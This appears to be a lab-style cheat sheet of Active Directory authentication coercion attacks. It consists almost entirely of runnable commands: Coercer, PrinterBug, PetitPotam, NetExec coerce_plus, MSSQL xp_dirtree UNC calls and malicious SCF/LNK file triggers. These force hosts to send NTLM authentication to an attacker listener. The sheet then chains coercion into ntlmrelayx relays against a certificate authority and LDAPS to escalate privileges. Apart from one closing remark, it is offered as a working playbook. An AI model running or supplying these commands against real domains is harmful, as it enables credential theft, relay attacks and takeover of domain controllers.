Coercion forces a Windows host to authenticate to a listener we control. We use it when poisoning is too passive or when we need a specific machine account, such as a domain controller, to authenticate into a relay.
Coercer scan
coercer scan -d ootw.local -u student -p 'student' --target 10.10.10.200 --listener 10.10.10.100
Coercer authenticated trigger
coercer coerce -d ootw.local -u student -p 'student' --target 10.10.10.200 --listener 10.10.10.100
Coercer with NTLM hash
coercer coerce -d ootw.local -u student --hashes :<NTLM_HASH> --target 10.10.10.200 --listener 10.10.10.100
Coercer anonymous attempt
coercer coerce --target 10.10.10.200 --listener 10.10.10.100
PrinterBug
printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100
PetitPotam
PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200
NetExec coerce plus
nxc smb 10.10.10.200 -d ootw.local -u student -p 'student' -M coerce_plus -o LISTENER=10.10.10.100
MSSQL UNC coercion
EXEC master..xp_dirtree '\\10.10.10.100\share',1,1;
EXEC master..xp_fileexist '\\10.10.10.100\share\file.txt';
File-based triggers
SCF with IconFile pointing to \\10.10.10.100\share\icon.ico
LNK with icon path pointing to \\10.10.10.100\share\icon.ico
library-ms referencing a UNC path
SVG or HTML content that references a UNC or WebDAV resource
Coerce into ADCS relay
ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200
Coerce into LDAP relay for RBCD
ntlmrelayx.py -t ldaps://dc01.ootw.local --delegate-access --escalate-user 'ATTACKER01$' -smb2support
coercer coerce -d ootw.local -u student -p 'student' --target 10.10.10.200 --listener 10.10.10.100
Notes
Coercion does not provide access by itself. It provides the inbound authentication. The relay target and post-relay action decide the impact.